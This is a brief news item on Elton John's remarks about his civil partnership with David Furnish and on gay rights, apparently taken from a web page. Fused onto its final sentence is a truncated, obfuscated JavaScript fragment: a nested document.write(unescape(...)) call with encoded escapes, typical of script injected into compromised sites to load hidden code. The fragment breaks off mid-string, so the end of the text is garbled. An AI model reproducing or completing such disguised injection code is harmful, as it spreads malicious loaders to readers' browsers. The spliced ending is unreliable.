Elton John says he's overjoyed that he'll be able to form a union with his gay lover on Wednesday, but he still feels for the gay people who cannot do that.
John will form a civil partnership with his longtime partner, David Furnish, on Wednesday. Gay civil partnerships will become legal on that day, although the British government is not calling them "marriages." John writes in The Observer it's been a long struggle for gay rights, but now they have "real civil rights, tolerance and final acceptance in our lives." He says Wednesday will be "the happiest day of my life," but he'll keep in mind that in many countries, same-sex partnerships are outlawed. He says he feels gay people can make a difference if they show solidarity.document.write(unescape("\074\123CR\111PT%3E\144oc%75\155%65n\04574.w%72\151te\050un\145\163ca\160e(%22
